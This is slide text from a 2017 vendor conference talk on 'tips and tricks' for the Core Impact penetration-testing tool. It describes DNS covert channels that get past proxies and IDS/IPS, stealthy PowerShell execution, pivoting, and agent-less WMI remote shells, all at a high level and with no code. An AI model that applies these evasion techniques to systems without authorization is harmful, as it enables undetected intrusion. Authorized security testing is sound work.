CONNECT  2017  Core  Impact  Tips  &  Tricks

Martin  Gallo,  Product Owner,  Core  Security

AGENDA

• Challenge:  Restricted  environment• Tip  &  Trick  #1:  DNS  Channel• Tip  &  Trick  #2:  Temporal  Agents• Tip  &  Trick  #3:  Pivoting  w/PCAP• Tip  &  Trick  #4:  Remote  interface• Tip  &  Trick  #5:  PowerShell• Tip  &  Trick  #6:  Agent-­‐less  WMI  Shell• Tip  &  Trick  #7:  Customizable  reports

N o   d i r e c t  o u t b o u n d  

c o n n e c t i o n s

N e t w o r k  r e s t r i c t e d  

e n v i r o nm e n t

A d v a n c e d  d e f e n s i v e  m e c h a n i s m

ChallengeRestricted environment

Environment

Internal  Servers  Network

Servers

Critical data

Corporate users

Active  Directory

Proxy,  IDS/IPS,  ..

Internet

DNS

Core  ImpactConsole

Workstations  Network

Tip &  Trick #1:  DNS  Channel

• Communication  channel  between  Impact  and  target• Uses  DNS  traffic  with  port  53/tcp/udp

• TXT  records  for  download• A  records  for  upload

• No  need  for  external  outbound  Internet  connection• Stealth  and  useful  on  restricted  environments

• Web  Proxy,  IDS/IPS  with DPI,  etc.

• Encrypted  and  with  all  the  functionality

Downside:• Slower  than  other  channels

Tip &  Trick #2:  Temporal  agents

• Ability  to  set  a  termination  date  for  agents• Client  side,  network  and  Web  agents• Temporal  persistency  auto-­‐uninstallation• Useful  on  short  engagements

Tip &  Trick #3:  Pivoting w/PCAP

• Install  PCAP  plugin  after  agent  installation• Transparent  Pivoting  with  agent• Speed  up  port  and  service  scans

Tip &  Trick #4:  Remote interface

• Mapping  network  interface  in  remote  agent• Setup  a  VPN  connection• Works  on  Linux  systems  too• Transparent  and  flexible

Tip &  Trick #5:  PowerShell

• Run  native  PowerShell  code  in  agent• Instantiation  of  PowerShell  .NET  interface

• Stealth,  no  use  of  “powershell.exe”

• Can  load  PS  scripts  from  any  URL• Works  with  pivoting  connection• Target  don’t  need  to  be  able  to  reach  URL

• PowerShell  Empire  integration

Tip &  Trick #6:  Agent-­‐less WMI  shell

• Launch  a  remote  shell  using  WMI• Not  agent  installation  required• Integrated  with  Identity  Manager  credentials  store• Quick  and  stealth

Tip &  Trick #7:  Customizable reports

• Reports  can  be  customized  as  desired• Easy  to  adapt  and  tailor  to  user’s  need• Fast  and  effective

Q&A

Got  some  more  tips  &  tricks  to  share?

THANK  YOU